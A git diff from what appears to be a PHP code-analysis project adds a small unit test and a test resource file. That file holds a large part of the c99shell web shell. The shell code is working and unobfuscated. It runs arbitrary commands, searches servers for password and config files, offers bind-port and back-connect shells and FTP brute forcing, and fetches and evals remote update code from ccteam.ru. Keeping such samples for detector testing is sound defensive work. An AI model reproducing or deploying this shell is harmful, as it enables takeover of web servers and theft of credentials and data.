+use function AnalyzerNS\removeWhiteSpacesOutsideString;
+
+class UtilTest extends TestCase
+{
+    private $strings = ["<?php\n
+    \$a =               10;
+    \$b = 'phpi     nfo';
+    
+    echo \$a;
+    \$b();?>",
+    "<?php function inline(){return             true;}
+    phpinfo();?>"
+    ];
+    
+    public function testRemoveCRLF()
+    {
+        foreach ($this->strings as $string) {
+            $this->assertTrue(removeCRLF($string) !== $string);
+        }
+    }
+    
+    public function testRemoveMultiWhiteSpaces()
+    {
+        foreach ($this->strings as $string) {
+            $this->assertTrue(removeMultiWhiteSpaces($string) !== $string);
+        }
+    }
+    
+    public function testRemoveAllWhiteSpaces()
+    {
+        foreach ($this->strings as $string) {
+            $this->assertTrue(removeAllWhiteSpaces($string) !== $string);
+        }
+    }
+    
+    public function testRemoveWhiteSpacesOutsideString()
+    {
+        foreach ($this->strings as $string) {
+            $this->assertTrue(removeWhiteSpacesOutsideString(token_get_all($string)) !== $string);
+        }
+    }
+}
diff --git a/tests/res/c.php b/tests/res/c.php
new file mode 100644
index 0000000000000000000000000000000000000000..dc6d688a4b543e27889d4dba735f5f31c27c898a
--- /dev/null
+++ b/tests/res/c.php
@@ -0,0 +1,3069 @@
+<?php
+/*
+******************************************************************************************************
+*
+*					c99shell.php v.1.0 pre-release build #13
+*							Freeware license.
+*								© CCTeaM.
+*  c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
+*  Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
+   http://ccteam.ru/releases/c99shell
+*
+*  WEB: http://ccteam.ru
+*  ICQ UIN #: 656555
+*
+*  Îñîáåííîñòè:
+*  + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
+*    çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
+*    (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar)
+*    ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
+*    modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (äëÿ îòêë. ñì $filestealth)
+*  + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
+*  + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
+*  + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
+*  + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
+*    ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
+*  + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
+     òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
+     èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
+*  + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
+*    èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
+*  + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
+*  + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèÿõ àâòîðó (÷åðåç mail())
+*
+*	Ïðèâåäåí äàëåêî íå ïîëíûé ñïèñîê âîçìîæíîñòåé.
+*
+*   Îæèäàåìûå èçìåíåíèÿ:
+*  ~ Ðàçâèòèå sql-ìåíåäæåðà
+*  ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
+*
+*  ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
+       â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
+*
+*  Last modify: 29.07.2005
+*
+*  © Captain Crunch Security TeaM. Coded by tristram
+*
+******************************************************************************************************
+*/
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+
+$shver = "1.0 pre-release build #13"; //Current version
+//CONFIGURATION AND SETTINGS
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
+}
+
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+//Authentication
+$login = ""; //login
+//DON'T FORGOT ABOUT PASSWORD!!!
+$pass = ""; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Restricted area"; //http-auth message.
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
+
+$gzipencode = true; //Encode with gzip?
+
+$updatenow = false; //If true, update now (this variable will be false)
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
+
+$filestealth = true; //if true, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by hacker</b></center>";
+		/* If you publish free shell and you wish
+		add link to your site or any other information,
+		put here your html. */
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+$sort_save = true; //If true then save sorting-position using cookies.
+
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+	0 - files and folders (as default),
+	1 - files only, 2 - folders only
+  string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if true and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+									 // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$datapipe_localport = "8081"; // default port for datapipe
+
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Remove copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Tools</b>",$surl."act=tools&d=%d"),
+ array("<b>Proc.</b>",$surl."act=processes&d=%d"),
+ array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>Sec.</b>",$surl."act=security&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=eval&d=%d"),
+ array("<b>Update</b>",$surl."act=update&d=%d"),
+ array("<b>Feedback</b>",$surl."act=feedback&d=%d"),
+ array("<b>Self remove</b>",$surl."act=selfremove"),
+ array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()")
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// 				\/	Next code isn't for editing	\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img")
+{
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return false;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return false;}
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== false)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== false) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("c99getsource"))
+{
+function c99getsource($fn)
+{
+ global $c99sh_sourcesurl;
+ $array = array(
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt",
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt",
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
+ );
+ $name = $array[$fn];
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);}
+ else {return false;}
+}
+}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate($update = true)
+{
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
+ $data = @file_get_contents($url);
+ if (!$data) {return "Can't connect to update-server!";}
+ else
+ {
+  $data = ltrim($data);
+  $string = substr($data,3,ord($data{2}));
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+  if ($data{0} == "\x99" and $data{1} == "\x03")
+  {
+   $string = explode("\x01",$string);
+   if ($update)
+   {
+    $confvars = array();
+    $sourceurl = $string[0];
+    $source = file_get_contents($sourceurl);
+    if (!$source) {return "Can't fetch update!";}
+    else
+    {
+     $fp = fopen(__FILE__,"w");
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
+    }
+   }
+   else {return "New version are available: ".$string[1];}
+  }
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
+  else {return "Error in protocol: segmentation failed! (".$data.") ";}
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
